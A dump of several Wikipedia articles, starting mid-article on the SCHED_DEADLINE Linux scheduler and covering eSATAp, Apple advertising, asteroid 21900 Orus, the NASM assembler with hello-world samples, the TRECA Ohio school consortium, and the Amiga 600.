The second version of the scheduler has been submitted to LKML on February 28, 2010, and had a first implementation of the Deadline Inheritance protocol.
The third version of the scheduler has been submitted to LKML on October 29, 2010, and it added support for global/clustered multiprocessor scheduling through dynamic task migrations.
The fourth version of the scheduler has been submitted to LKML on April 6, 2012, and has better handling of rq selection for dynamic task migration and better integration with PREEMPT_RT.
The fifth version of the scheduler has been submitted to LKML on May 23, 2012.
The sixth version of the scheduler has been submitted to LKML on October 24, 2012.
The seventh version of the scheduler has been submitted to LKML on February 11, 2013. Internal math has been restricted to microseconds resolution (to avoid overflows) and the RFC tag has been removed.
The eighth version of the scheduler has been submitted to LKML on October 14, 2013.
The ninth version of the scheduler has been submitted to LKML on November 7, 2013.
The last version was merged into the mainline Linux kernel (commit number a0fa1dd3cdbccec9597fe53b6177a9aa6e20f2f8), and is since then a regular part of it.
Articles on Linux Weekly News and Phoronix websites argued that SCHED_DEADLINE may be merged into the mainline kernel in the very next releases.
Finally, after more than four years and the submission of nine releases, the patch has been accepted and merged into the Linux kernel 3.14.
Before SCHED_DEADLINE, the Real-Time Systems (ReTiS) Lab of Scuola Superiore Sant'Anna had provided various other open-source implementations of CBS and its variants within the Linux kernel, in the context of other European research projects, including OCERA, the AQuoSA architecture within the FRESCOR project, and IRMOS. However, these prior efforts started with an academic approach where the main aim was to gather experimental results for research projects, rather than providing an implementation suitable for integration within the mainline kernel. With IRMOS, the lab had a first serious contact with Linux kernel developers.
Since kernel 4.13, SCHED_DEADLINE completed CBS with the Greedy Reclamation of Unused Bandwidth (GRUB) algorithm. The support has been developed by ReTiS Lab with the collaboration of Evidence Srl.
Since kernel 4.16, SCHED_DEADLINE has been further evolved to reduce energy consumption on ARM platforms by implementing the GRUB-PA algorithm. The work has been done by ARM Ltd. in collaboration with Evidence Srl and Scuola Superiore Sant'Anna.
Academic background
SCHED_DEADLINE has been presented through some academic workshops, conferences and journals:
Dario Faggioli, Fabio Checconi, Michael Trimarchi, Claudio Scordino, An EDF scheduling class for the Linux kernel, 11th Real-Time Linux Workshop (RTLWS), Dresden, Germany, September 2009
Nicola Manica, Luca Abeni, Luigi Palopoli, Dario Faggioli, Claudio Scordino, Schedulable Device Drivers: Implementation and Experimental Results, International Workshop on Operating Systems Platforms for Embedded Real-Time Applications (OSPERT), Brussels, Belgium, July 2010
Juri Lelli, Giuseppe Lipari, Dario Faggioli, Tommaso Cucinotta, An efficient and scalable implementation of global EDF in Linux, International Workshop on Operating Systems Platforms for Embedded Real-Time Applications (OSPERT), Porto (Portugal), July 2011.
Enrico Bini, Giorgio Buttazzo, Johan Eker, Stefan Schorr, Raphael Guerra, Gerhard Fohler, Karl-Erik Arzen, Vanessa Romero Segovia, Claudio Scordino, Resource Management on Multicore Systems: The ACTORS Approach, IEEE Micro, vol. 31, no. 3, pp. 72–81, May/June 2011.
Andrea Parri, Juri Lelli, Mauro Marinoni, Giuseppe Lipari, Design and Implementation of the Multiprocessor Bandwidth Inheritance Protocol on Linux, 15th Real-Time Linux Workshop (RTLWS), Lugano-Manno, Switzerland, October 2013.
Luca Abeni, Juri Lelli, Claudio Scordino, Luigi Paolopoli, Greedy CPU reclaiming for SCHED_DEADLINE, Proceedings of 16th Real-Time Linux Workshop (RTLWS), Düsseldorf, Germany, October 2014.
Juri Lelli, Claudio Scordino, Luca Abeni, Dario Faggioli, Deadline scheduling in the Linux kernel, Software: Practice and Experience, 46(6): 821–839, June 2016.
Claudio Scordino, Luca Abeni, Juri Lelli, Energy-Aware Real-Time Scheduling in the Linux Kernel, 33rd ACM/SIGAPP Symposium On Applied Computing (SAC 2018), Pau, France, April 2018.
Claudio Scordino, Luca Abeni, Juri Lelli, Real-time and Energy Efficiency in Linux: Theory and Practice, ACM SIGAPP Applied Computing Review (ACR) Vol. 18 No. 4, 2018.
The project has been also presented at the Kernel Summit in 2010, at the Linux Plumbers Conference 2012, and at the Embedded Linux Conference 2013.
Other information
The project has an official page. Before mainline integration, the code used to be publicly available on a GitHub website, which replaced the previous repository on Gitorious. Since mainline integration, the official code is included in the Linux kernel source tree.
Several articles have appeared on Linux Weekly News, Slashdot, OSNews and LinuxToday.
A video has been uploaded on YouTube as well.
Before integration in the mainline kernel, SCHED_DEADLINE was already integrated into the Yocto Project.
and there had also been some interest for inclusion in Linaro projects.
See also
Completely Fair Scheduler
References
Linux kernel process schedulers
Articles with underscores in the title
|
28383598
|
https://en.wikipedia.org/wiki/ESATAp
|
ESATAp
|
In computing, eSATAp (also known as Power over eSATA, Power eSATA, eSATA/USB Combo, eSATA USB Hybrid Port/EUHP) is a combination connection for external storage devices. An eSATA or USB device can be plugged into an eSATAp port. The socket has keyed cutouts for both types of device to ensure that a connector can only be plugged in the right way.
Standard
As the port is designed to work with both SATA and USB, both organizations have formally approved it. The USB Implementers Forum states it does not support any connector used by other standards, hence such 'combo' ports are to be used at one's own risk. As of 2011 the organization responsible for the SATA specification, SATA-IO (Serial ATA International Organization), is working to define the eSATAp specification.
Implementation
SATA is a computer bus interface for connecting host bus adapters to mass storage devices such as hard disk drives and optical drives. eSATA is a SATA connector accessible from outside the computer, to provide a signal (but not power) connection for external storage devices.
eSATAp combines the functionality of an eSATA and a USB port, and a source of power in a single connector. eSATAp can supply power at 5 V and 12 V.
On a desktop computer the port is simply a connector, usually mounted on a bracket at the back accessible from outside the machine, connected to motherboard sources of SATA, USB, and power at 5 V and 12 V. No change is required to drivers, registry or BIOS settings and the USB support is independent of the SATA connection.
If advanced functionality such as a port multiplier is required, a PCI Express add-on card can be used. If it has port multiplier support, an eSATAp port allows a user to connect to a multi-bay NAS (network attached storage) machine with multiple hard disks (HDD) using one eSATA cable.
On many notebook computers only a limited amount of power at 5 V is available, and none at all at 12 V. Devices requiring more power than is available via the Expresscard, or an additional 12 V supply as required by most 3.5" or 5.25" drives, can be driven if an additional power supply is used. Cables are available to both connect and power a SATA device from an eSATAp port (including 12 V power if available).
Compatibility
eSATAp throughput is not necessarily the same as SATA, many enclosures and docks that support both eSATA and USB use combo bridge chips which can severely reduce the throughput, and USB throughput is that of the USB version supported by the port (typically USB 3.0 or 2.0). eSATAp ports (bracket versions) can run at a theoretical maximum of 6 gigabits per second (Gbit/s) and are backwards compatible with devices such as eSATA 3 Gbit/s (SATA Revision 2) and also at 1.5 Gbit/s (SATA Revision 1). The USB port is fully compatible with USB 5 Gbit/s (USB 3.0), USB 480 Mbit/s (USB 2.0) and USB 12 Mbit/s (1.1); USB 3.0 devices are compatible, but will operate at USB 2.0 speed if internal USB 3.0 connector is not connected.
+12 V issue
There are only two versions of this port. Most laptop computers do not have 12 V power available, and have an eSATAp port which provides only 5 V. Desktop computers, with 12 V available, have a port with two additional pads, placed against the plug's "horns", which provide 12 V. Some manufacturers refer to these ports as eSATApd, where d stands for "dual voltage". Some devices, such as 2.5-inch drives, can operate off the 5 V supplied by laptop eSATAp ports. Others, such as 3.5-inch drives, also require 12 V; they can be powered from a desktop eSATAp port, but require an external 12 V power supply if used with a laptop computer. This can lead to confusion if users are not aware of the distinction.
eSATAp PCI and PCI-e add-on cards are available for desktop computers. They usually provide two eSATAp ports, with port multiplier functionality, and hot-swap capability.
eSATAp cables are available with wide connectors to plug directly into the power and signal connectors of a bare drive, providing a 12 V supply in the case of a desktop machine. A version of this wide connector is found inside every external SATA hard drive enclosure; when the hard drive is slid inside, it mates with a connector that supplies it with both signal and power.
If the smaller side of this cable is plugged into a "powered" ESATA port, providing both 12 V and 5 V, then the wide end may be plugged into a 2.5" or 3.5" SATA hard drive, supplying the bare drive with both signal and power. The small 2.5" drive will get signal and power at 5 V, which is all that the smaller drive requires, and which the larger 3.5" drive requires only for its logic board. Additionally, the larger 3.5" drive will get the 12 V it needs to power its disk spindle motor. Thus a bare hard drive may be attached directly to the computer, powered by the unique cable, where it will run at full SATA speeds, without the necessity of placing the hard drive into an external enclosure.
Naming
The following names are used by different manufacturers for the same port:
eSATAp (Delock, Dynex, Lindy, Addonics)
eSATApd (Used by Delock to distinguish a port that supplies both +5 V and +12 V)
Power over eSATA (Delock, Micro-Star International (MSI))
eSATA/USB (Gigabyte Technology)
Power eSATA/USB (ASRock)
Other computer manufacturers are shipping computers and motherboards with eSATAp ports including Dell, HP, Lenovo, Sony and Toshiba.
Patents
US Patent US7572146B1 appears to document the eSATApd variant.
References
Bibliography
eSATA | SATA-IO
Upgrading and Repairing PCs: Upgrading and Repairing_c22
Moving Media Storage Technologies: Applications & Workflows for Video and Media Server Platforms
External links
eSATAp
eSATA USB hybrid (EUHP) connector pinout
Serial buses
USB
|
8260899
|
https://en.wikipedia.org/wiki/Apple%20Inc.%20advertising
|
Apple Inc. advertising
|
Apple Inc. has had many notable advertisements since the 1980s. The "1984" Super Bowl commercial introduced the original Macintosh mimicking imagery from George Orwells 1984. The 1990s Think Different campaign linked Apple to famous social figures such as John Lennon and Mahatma Gandhi, while also introducing "Think Different" as a new slogan for the company. Other popular advertising campaigns include the 2000s "iPod People", the 2002 Switch campaign, and most recently the Get a Mac campaign which ran from 2006 to 2009.
While Apple's advertisements have been mostly successful, they have also been met with controversy from consumers, artists and other corporations. For instance, the "iPod People" campaign was criticized for copying a campaign from a shoe company called Lugz. Another instance was when photographer Louie Psihoyos filed suit against Apple for using his "wall of videos" imagery to advertise for Apple TV without his consent.
1980–1985
A "Macintosh Introduction" 18-page brochure was included with various magazines in December 1983, often remembered because Bill Gates was featured on page 11. For a special post-election edition of Newsweek in November 1984, Apple spent more than $2.5 million to buy all of the advertising pages in the issue (a total of 39).
Apple also ran a "Test Drive a Macintosh" promotion that year, in which potential buyers with a credit card could try a Macintosh for 24 hours and return it to a dealer afterwards.
One ad contrasted the original Macintosh and its simple user brochure to the IBM Personal Computer with its stacks of complicated manuals.
"1984" television commercial: launching the Macintosh
"1984" (directed by Ridley Scott) is the title of the television commercial that launched the Macintosh personal computer in the United States, in January 1984.
The commercial was first aired nationally on January 22, 1984, during a break in the third quarter of Super Bowl XVIII. The ad showed an unnamed heroine (played by Anya Major) wearing orange shorts, red running shoes, and a white tank top with a Picasso-style picture of Apple's Macintosh computer, running through an Orwellian world to throw a sledgehammer at a TV image of Big Brother — an implied representation of IBM played by David Graham.
The concluding screen showed the message and voice over "On January 24th, Apple Computer will introduce Macintosh. And you'll see why 1984 won't be like '1984'." At the end, the "rainbow bitten" Apple logo is shown on a black background.
1985–1990
In 1985 the "Lemmings" commercial aired at the Super Bowl, a significant failure compared to the popular "1984."
Two years later, Apple released a short film titled Pencil Test to showcase the Macintosh II's animation capabilities.
1990–1995
In the 1990s, Apple launched the "What's on your PowerBook?" campaign. Print ads and television commercials featured celebrities describing how the PowerBook helped them in their businesses and everyday lives.
During 1995, Apple ran an infomercial called "The Martinetti's Bring Home a Computer" to sell Macintosh computers and promote its Performa line. The infomercial followed the fictional Martinetti family as they brought home their first computer and attempted to convince the father of the family to keep the computer by using it for various educational, business and other household purposes.
In the 1990s, Apple launched "Power" advertisements for its Power Macintosh.
Apple also responded to the introduction of Windows 95 with print ads and a television commercial.
1995–2000
"Think Different"
"Think Different" was an advertising slogan created by the New York branch office of advertising agency TBWA\Chiat\Day for Apple Computer during the late 1990s. It was used in a famous television commercial and several print advertisements. The slogan was used at the end of several product commercials, until the advent of Apple's Switch ad campaign. Apple no longer uses the slogan; its commercials usually end with a silhouetted Apple logo and sometimes a pertinent website address.
Television commercials
Significantly shortened versions of the text were used in two television commercials titled "Crazy Ones".
The one-minute commercial featured black and white video footage of significant historical people of the past, including (in order) Albert Einstein, Bob Dylan, Martin Luther King Jr., Richard Branson, John Lennon, R. Buckminster Fuller, Thomas Edison, Muhammad Ali, Ted Turner, Maria Callas, Mahatma Gandhi, Amelia Earhart, Alfred Hitchcock, Martha Graham, Jim Henson (with Kermit the Frog), Frank Lloyd Wright, and Picasso.
The thirty-second commercial used many of the same people, but closed with Jerry Seinfeld, instead of the young girl. In order: Albert Einstein, Bob Dylan, Martin Luther King, Jr., John Lennon, Martha Graham, Muhammad Ali, Alfred Hitchcock, Mahatma Gandhi, Jim Henson, Maria Callas, Picasso, and Jerry Seinfeld.
Print advertisements
Print advertisements from the campaign were published in many mainstream magazines such as Newsweek and Time. These were often traditional advertisements, prominently featuring the company's computers or consumer electronics along with the slogan. However, there was also another series of print ads which were more focused on Apple's brand image than specific products. They featured a portrait of one of the historic figures shown in the television ad, with a small Apple logo and the words "Think Different" in one corner (with no reference to the company's products).
2001–present
"Switch"
"Switch" was an advertising campaign launched by Apple on June 10, 2002. "The Switcher" was a term conjured by Apple, it refers to a person who changes from using the Microsoft Windows platform to the Mac. These ads featured what the company referred to as "real people" who had "switched". An international television and print ad campaign directed users to a website where various myths about the Mac platform were dispelled.
iPod
Apple has promoted the iPod and iTunes with several advertising campaigns, particularly with their silhouette commercials used both in print and on TV. These commercials feature people as dark silhouettes, dancing to music against bright-colored backgrounds. The silhouettes hold their iPods which are shown in distinctive white. The TV advertisements have used a variety of songs from both mainstream and relatively unknown artists, whilst some commercials have featured silhouettes of specific artists including Bob Dylan, U2, Eminem, Jet, The Ting Tings, Yael Naïm, CSS, Caesars, and Wynton Marsalis.
Successive TV commercials have also used increasingly complex animation. Newer techniques include the use of textured backgrounds, 3D arenas, and photo-realistic lighting on silhouette characters. The "Completely Remastered" ads (for the 2nd generation iPod nano) have a different design, in which the background is completely black.
The colored iPod nanos shine light and glow, showing some of the dancers, holding the iPod nanos while a luminescent light trail made by moving iPod nanos. This is to display the fact that the 2nd generation iPod nanos are colored. The silhouette commercials are a family of commercials in a similar style that form part of the advertising campaign to promote the iPod, Apple's portable digital music player.
"Get a Mac"
In 2006, Apple released a series of twenty-four "I'm a Mac, I'm a PC" advertisements as part of their "Get a Mac" campaign. The campaign officially ended in 2010 due to the introduction of the iPad.
The ads, which are directed by Phil Morrison, star actor Justin Long (Accepted) and author and humorist John Hodgman (The Daily Show) as a Macintosh (Mac) computer and a Windows PC, respectively.
Since the launch of the original ads, similar commercials have appeared in Japan and the UK. While they use the same form and music as the American ads, the actors are specific to those countries.
The UK ads feature famous comedy duo Mitchell and Webb, with David Mitchell as the Windows PC and Robert Webb as the Mac computer. The Japanese ones are played by Rahmens, with Jin Katagiri as the Windows PC and Kentarō Kobayashi as the Mac computer.
In April 2009, Justin Long revealed that the "Get A Mac" commercials "might be done". In May 2010, the "Get A Mac" was officially ended and the web pages began to redirect to a new "Why You'll Love Mac" page with more features on the Macintosh hardware and software.
Genius ads
Apple debuted a new series of ads produced by TBWA\Media Arts Lab during television broadcasts of the 2012 Summer Olympics opening ceremony. The ads portrayed people in everyday situations being assisted by an employee from the company's Genius Bars. The ads were widely criticized, with some, including former TBWA\Chiat\Day creative director Ken Segall remarking that it portrayed Apple customers as clueless. The
iPhone Ads
Apple has aired many advertisements promoting the different models of the iPhone since its initial release in 2007. This company is well known for their advertisements and marketing strategy. Apple segments its customer base by using behavioral, demographic, and psychographic factors. Within their iPhone advertising, Apple has made it a point to highlight the key features that their phone has to offer. Apple highlights alleged superior performance, camera quality, privacy and many other factors that they say they set their product apart. Apple aims to win over the majority of smartphone users by showing customers the great features the iPhone has to offer. One way Apple does this is by sending ordinary users out into the world to capture pictures and videos. The ads show how the camera feature works and claim that such pictures can be taken by anyone, as long as it is only on an iPhone, not other brand's phones.
A second strategy Apple has is comparing their product with rival products in their advertisements. Ads that show the relative advantage the iPhone has over competitor products. They focus on potential switchers who currently are using another smartphone brand. The iPhone advertising campaign took flight in 2007 and has continued into 2019.
Apple released the first advertisement for the iPhone in February 2007 during the national broadcast of the Academy Awards. The 30-second commercial featured cuts of famous figures answering their telephones, all saying "Hello". As it progressed, the ad showed more recent versions of the telephone; it ended with a preview of the first generation iPhone to draw a connection between the iPhone". Other features included in those advertisements were email, camera, and general touchscreen capabilities.
In September 2016, the "Don't Blink" web video campaign was launched, which described the new Apple product line in 107 seconds with fast typography. It has since gone on to become an often-used video template on social media.
Apple Music Ads
Apple Music ads have had a theme throughout recent years. Apple uses celebrities, like dancers and singers to star in their Apple Music commercials along with their ear bud commercials starring dancer like Lil Buck. Recently in 2016, Taylor Swift released her new Apple Music ad that featured a Drake song. Not only was this successful for Apple because of the humor of the plot line, but it spurred a 431% jump in sales for Drake.
Criticism
Apple's advertising has come under criticism for adapting other creative works as advertisements and for inaccurate depictions of product functionality.
Some artists and unrelated businesses have complained that Apple's advertisements use their ideas. A 2005 iPod campaign starring rapper Eminem, called "Detroit", was criticized for being too similar to a 2002 advertisement for Lugz boots. A 2006 television advertisement was made by a director who had also made music videos for an American band, and the ad was criticized for being too similar to the music videos. Artist Christian Marclay denied Apple the rights to his 1995 short film "Telephones" to market Apple's iPhone, but Apple ran an ad during the 2007 Academy Awards broadcast that "seems like a tribute" to Marclay's experimental film. In July 2007, Colorado-based photographer Louie Psihoyos filed suit against Apple for using his "wall of videos" imagery to advertise for Apple TV. Apple had allegedly been negotiating with Psihoyos for rights to the imagery, but backed out and used similar imagery anyway. Psyhoyos later dropped the lawsuit. Generally, copyright law prohibits copying specific expressions, but does not prohibit adapting ideas for other purposes, including as a tribute through allusions to works created by the honored artist.
In August 2008, the Advertising Standards Authority (ASA) in the UK banned one iPhone ad from further broadcast in its original form due to "misleading claims". The ASA took issue with the ads' claim that "all parts of the internet are on the iPhone", when the device did not support Java or Adobe's third-party Flash web browser plug-in. The newer iPhone ads presented a "Sequence Shortened" caption at the beginning.
In 2012 Apple was sued in Australia for branding its 2012 iPad as being 4G capable, even though the iPad was not compatible with Australia's 4G network. Apple offered a refund to customers for all iPads sold in Australia. Apple Inc. agreed to pay a A$2.25 million penalty for misleading Australian customers about its iPad being 4G capable.
References
External links
The Macintosh Marketing Campaign
Macintosh Television Advertising Over Thirty Years
Advertising campaigns
|
48246553
|
https://en.wikipedia.org/wiki/21900%20Orus
|
21900 Orus
|
21900 Orus is a Jupiter trojan from the Greek camp, approximately in diameter, and a target of the Lucy mission to be visited in November 2028. The dark Jovian asteroid belongs to the 100 largest Jupiter trojans and has a rotation period of 13.5 hours. It was discovered on 9 November 1999, by Japanese amateur astronomer Takao Kobayashi at his private Ōizumi Observatory in Gunma Prefecture, Japan, and later named Orus after a slain Achaean warrior from the Iliad.
Orbit and classification
Orus is a dark Jovian asteroid orbiting in the leading Greek camp at Jupiter's Lagrangian point, 60° ahead of its orbit in a 1:1 resonance . It is also a non-family asteroid in the Jovian background population.
It orbits the Sun at a distance of 4.9–5.3 AU once every 11 years and 7 months (4,240 days; semi-major axis of 5.13 AU). Its orbit has an eccentricity of 0.04 and an inclination of 8° with respect to the ecliptic. The body's observation arc begins with a precovery, published by the Digitized Sky Survey and taken at Palomar Observatory in November 1951, or 48 years prior to its official discovery observation.
Lucy mission target
Orus is planned to be visited by the Lucy spacecraft which was launched in 2021. The fly by is scheduled for 20 November 2028, and will approach the asteroid to a distance of 1000 kilometers at a velocity of 7.1 kilometers per second.
Physical characteristics
Orus is characterized as a D-type and C-type asteroid by the Lucy mission team and by PanSTARRS photometric survey, respectively. It has a V–I color index of 0.95, seem among most larger D-type Jupiter trojans.
Lightcurve
The first photometric observations of Orus have been made in October 2009, by astronomer Stefano Mottola in a photometric lightcurve survey of 80 Jupiter trojans, using the 1.2-meter telescope at Calar Alto Observatory. The obtained rotational lightcurve rendered a period of hours with a brightness variation of 0.18 magnitude ().
In 2016, Mottola published a revised rotation period of , from ground-based observations taken over five apparitions in support of the Lucy mission. He finds that Orus is a retrograde rotator. The lightcurve suggests the presence of a large crater in the proximity of its north pole.
Diameter and albedo
According to the surveys carried out by the Japanese Akari satellite and the NEOWISE mission of NASA's Wide-field Infrared Survey Explorer, the body has an albedo of 0.083 and 0.075, with a diameter of 53.87 and 50.81 kilometers, respectively. The Collaborative Asteroid Lightcurve Link assumes a standard albedo for carbonaceous C-type asteroids of 0.057 and calculates a diameter of 55.67 kilometers with an absolute magnitude of 10.0.
Naming
This minor planet was named from Greek mythology after Orus, an Achaean warrior in Homer's Iliad. He was killed in the Trojan War by the Trojan prince Hector, after whom the largest Jupiter trojan 624 Hektor is named. The approved naming citation was published by the Minor Planet Center on 22 February 2016 ().
Satellite
Orus has a candidate satellite, detected while searching through Hubble images taken on August 7 and 8, 2018. Further observations are needed to determine physical characteristics of the satellite, which can help measure the mass of the primary.
See also
Discovery program
References
External links
Asteroid Lightcurve Database (LCDB), query form (info )
Dictionary of Minor Planet Names, Google books
Discovery Circumstances: Numbered Minor Planets (20001)-(25000) – Minor Planet Center
Asteroid 21900 Orus at the Small Bodies Data Ferret
021900
Discoveries by Takao Kobayashi
Minor planets named from Greek mythology
Named minor planets
021900
19991109
|
60647
|
https://en.wikipedia.org/wiki/Netwide%20Assembler
|
Netwide Assembler
|
The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture. It can be used to write 16-bit, 32-bit (IA-32) and 64-bit (x86-64) programs. NASM is considered to be one of the most popular assemblers for Linux.
NASM was originally written by Simon Tatham with assistance from Julian Hall. , it is maintained by a small team led by H. Peter Anvin. It is open-source software released under the terms of a simplified (2-clause) BSD license.
Features
NASM can output several binary formats, including COFF, OMF, a.out, Executable and Linkable Format (ELF), Mach-O and binary file (.bin, binary disk image, used to compile operating systems), though position-independent code is supported only for ELF object files. NASM also has its own binary format called RDOFF.
The variety of output formats allows retargeting programs to virtually any x86 operating system (OS). Also, NASM can create flat binary files, usable to write boot loaders, read-only memory (ROM) images, and in various facets of OS development. NASM can run on non-x86 platforms as a cross assembler, such as PowerPC and SPARC, though it cannot generate programs usable by those machines.
NASM uses a variant of Intel assembly syntax instead of AT&T syntax. It also avoids features such as automatic generation of segment overrides (and the related ASSUME directive) used by MASM and compatible assemblers.
Sample programs
This is a "Hello, world!" program for the DOS operating system.
section .text
org 0x100
mov ah, 0x9
mov dx, hello
int 0x21
mov ax, 0x4c00
int 0x21
section .data
hello: db 'Hello, world!', 13, 10, '$'
An equivalent program for Linux:
global _start
section .text
_start:
mov eax, 4 ; write
mov ebx, 1 ; stdout
mov ecx, msg
mov edx, msg.len
int 0x80 ; write(stdout, msg, strlen(msg));
xor eax, msg.len ; invert return value from write()
xchg eax, ebx ; value for exit()
mov eax, 1 ; exit
int 0x80 ; exit(...)
section .data
msg: db "Hello, world!", 10
.len: equ $ - msg
An example of a similar program for Microsoft Windows:
global _main
extern _MessageBoxA@16
extern _ExitProcess@4
section code use32 class=code
_main:
push dword 0 ; UINT uType = MB_OK
push dword title ; LPCSTR lpCaption
push dword banner ; LPCSTR lpText
push dword 0 ; HWND hWnd = NULL
call _MessageBoxA@16
push dword 0 ; UINT uExitCode
call _ExitProcess@4
section data use32 class=data
banner: db 'Hello, world!', 0
title: db 'Hello', 0
Below is a 64-bit program for Apple OS X that inputs a keystroke and shows it on the screen
global _start
section .data
query_string: db "Enter a character: "
query_string_len: equ $ - query_string
out_string: db "You have input: "
out_string_len: equ $ - out_string
section .bss
in_char: resw 4
section .text
_start:
mov rax, 0x2000004 ; put the write-system-call-code into register rax
mov rdi, 1 ; tell kernel to use stdout
mov rsi, query_string ; rsi is where the kernel expects to find the address of the message
mov rdx, query_string_len ; and rdx is where the kernel expects to find the length of the message
syscall
; read in the character
mov rax, 0x2000003 ; read system call
mov rdi, 0 ; stdin
mov rsi, in_char ; address for storage, declared in section .bss
mov rdx, 2 ; get 2 bytes from the kernel's buffer (one for the carriage return)
syscall
; show user the output
mov rax, 0x2000004 ; write system call
mov rdi, 1 ; stdout
mov rsi, out_string
mov rdx, out_string_len
syscall
mov rax, 0x2000004 ; write system call
mov rdi, 1 ; stdout
mov rsi, in_char
mov rdx, 2 ; the second byte is to apply the carriage return expected in the string
syscall
; exit system call
mov rax, 0x2000001 ; exit system call
xor rdi, rdi
syscall
Linking
NASM principally outputs object files, which are generally not executable by themselves. The only exception to this are flat binaries (e.g., .COM) which are inherently limited in modern use. To translate the object files into executable programs, an appropriate linker must be used, such as the Visual Studio "LINK" utility for Windows or ld for Unix-like systems.
Development
The first release, version 0.90, was released in October 1996.
On 28 November 2007, version 2.00 was released, adding support for x86-64 extensions. The development versions are not uploaded to SourceForge.net; instead, they are checked into GitHub with binary snapshots available from the project web page.
A search engine for NASM documentation is also available.
In July 2009, as of version 2.07, NASM was released under the Simplified (2-clause) BSD license. Previously, because NASM was licensed under LGPL, it led to development of Yasm, a complete rewrite of the NASM under the New BSD License. Yasm offered support for x86-64 earlier than NASM. It also added support for GNU Assembler syntax.
RDOFF
Relocatable Dynamic Object File Format (RDOFF) is used by developers to test the integrity of NASM's object file output abilities. It is based heavily on the internal structure of NASM, essentially consisting of a header containing a serialization of the output driver function calls followed by an array of sections containing executable code or data. Tools for using the format, including a linker and loader, are included in the NASM distribution.
Until version 0.90 was released in October 1996, NASM supported output of only flat-format executable files (e.g., DOS COM files). In version 0.90, Simon Tatham added support for an object-file output interface, and for DOS .OBJ files for 16-bit code only.
NASM thus lacked a 32-bit object format. To address this lack, and as an exercise to learn the object-file interface, developer Julian Hall put together the first version of RDOFF, which was released in NASM version 0.91.
Since this initial version, there has been one major update to the RDOFF format, which added a record-length indicator on each header record, allowing programs to skip over records whose format they do not recognise, and support for multiple segments; RDOFF1 only supported three segments: text, data and bss (containing uninitialized data).
The RDOFF format is strongly deprecated and has been disabled starting in NASM 2.15.04.
See also
Assembly language
Comparison of assemblers
References
Further reading
External links
Special edition for Win32 and BeOS.
A comparison of GAS and NASM at IBM
: a converter between the source format of the assemblers NASM and GAS
1996 software
Assemblers
Disassemblers
DOS software
Free compilers and interpreters
Linux programming tools
MacOS
MacOS programming tools
Programming tools for Windows
Software using the BSD license
|
10885991
|
https://en.wikipedia.org/wiki/Tri-Rivers%20Educational%20Computer%20Association
|
Tri-Rivers Educational Computer Association
|
Tri-Rivers Educational Computer Association (TRECA) in an information technology center (ITC) serving the state of Ohio and founded in 1979. It serves a consortium of local school districts across the state of Ohio, providing technology and educational support. TRECA provides services in the areas of student information systems, state reporting, fiscal services, instructional services, professional development training and information technology support.
TRECA also operates TRECA Digital Academy, an online public school for Ohio students in grades K-12 headquartered in Marion, Ohio. Operated by TRECA, the school provides students in many school districts in Ohio with distance learning options. The program serves nearly 3000 students and is particularly targeted at students who are at-risk, ill, or home-schooled. Students work from home on school-supplied computers; they correspond with teachers and send in assignments electronically. The Akron school district has the largest such program in Ohio. Students who complete the program through 12th grade graduate with a regular high school diploma and even a cap-and-gown graduation ceremony.
In 2018, TRECA Digital Academy began offering students an opportunity to learn workplace skills, earn college credit, and pursue industry credentials through a career technical education program called TRECA Tech. The courses in the program currently include cybersecurity, marketing, computer and web programming, business and administrative services, interactive media, finance, accounting, and Cisco networking.
References
External links
Official website
YouTube channel
Facebook page
Twitter page
Instagram page
Information technology organizations based in North America
Computer companies established in 1979
Schools in Ohio
Online K–12 schools
Online schools in the United States
|
64975
|
https://en.wikipedia.org/wiki/Amiga%20600
|
Amiga 600
|
The Amiga 600, also known as the A600, is a home computer introduced in March 1992. It is the final Amiga model based on the Motorola 68000 and the 1990 Amiga Enhanced Chip Set. A redesign of the Amiga 500 Plus, it adds the option of an internal hard disk drive and a PCMCIA port. Lacking a numeric keypad, the A600 is only slightly larger than an IBM PC keyboard and weighing approximately 6 pounds. It shipped with AmigaOS 2.0, which was considered more user-friendly than earlier versions of the operating system.
Like the A500, the A600 was aimed at the lower end of the market. Commodore intended it to revitalize sales of the A500-related line before the introduction of the 32-bit Amiga 1200. According to Dave Haynie, the A600 "was supposed to be cheaper than the A500, but it came in at about that much more expensive." The A600 was originally to have been numbered the A300, positioning it as a lower-budget version of the Amiga 500 Plus.
An A600HD model was sold with an internal 2.5" ATA hard disk drive of either 20 or 40 MB.
Amiga 600's compatibility with earlier Amiga models is rather poor. Roughly one third of games and demos made for A1000 or A500 do not work on A600.
Release
The managing director of Commodore UK, David Pleasance, described the A600 as a "complete and utter screw-up". In comparison to the popular A500 it was considered unexpandable, did not improve on the A500's CPU, was more expensive, and lacked a numeric keypad which some existing software such as F/A-18 Interceptor required.
The A600 was the first Amiga model to be manufactured in the UK. The factory was in Irvine, Scotland, although some later examples were manufactured in Hong Kong. It was also manufactured in the Philippines.
Technical information
The A600 shipped with a Motorola 68000 CPU, running at 7.09 MHz (PAL) or 7.16 MHz (NTSC) and 1 MB "chip" RAM with 80-ns access time.
Graphics and sound
The A600 is the last Amiga model to use Commodore's Enhanced Chip Set (ECS), which can address 2 MB of RAM and adds higher resolution display modes. The so-called Super Agnus display chip can drive screen modes varying from 320×200 pixels to 1280×512 pixels, with different frequency sync. As with the original Amiga chipset, up to 32 colors can be displayed from a 12-bit (4096 color) palette at lower display resolutions. An extra-half-bright mode offers 64 simultaneous colors by allowing each of the 32 colors in the palette to be dimmed to half brightness. Additionally, a 4096-color "HAM" mode can be used at lower resolutions. At higher resolutions, such as 800×600i, only 4 simultaneous colors can be displayed.
Sound was unchanged from the original Amiga design, namely, 4 DMA-driven 8-bit channels, with two channels for the left speaker and two for the right.
The A600 was the first Amiga model with a built-in RF modulator (RCA), which allowed the A600 to be used with a standard CRT television without the need for a Commodore A520 RF Modulator adaptor.
Peripherals and expansion
The A600 features Amiga-specific connectors including two DB9M ports for joysticks, mice, and light pens, a standard 25-pin RS-232 serial port and a 25-pin Centronics parallel port. As a result, the A600 is compatible with many peripherals available for earlier Amiga models, such as MIDI, sound samplers and video-capture devices.
Expansion capabilities new to the Amiga line were the PCMCIA Type II slot and the internal 44-pin ATA interface both most commonly seen on laptop computers. Both interfaces are controlled by the 'Gayle' custom chip. The A600 has internal housing for one 2.5" internal hard disk drive connecting to the ATA controller.
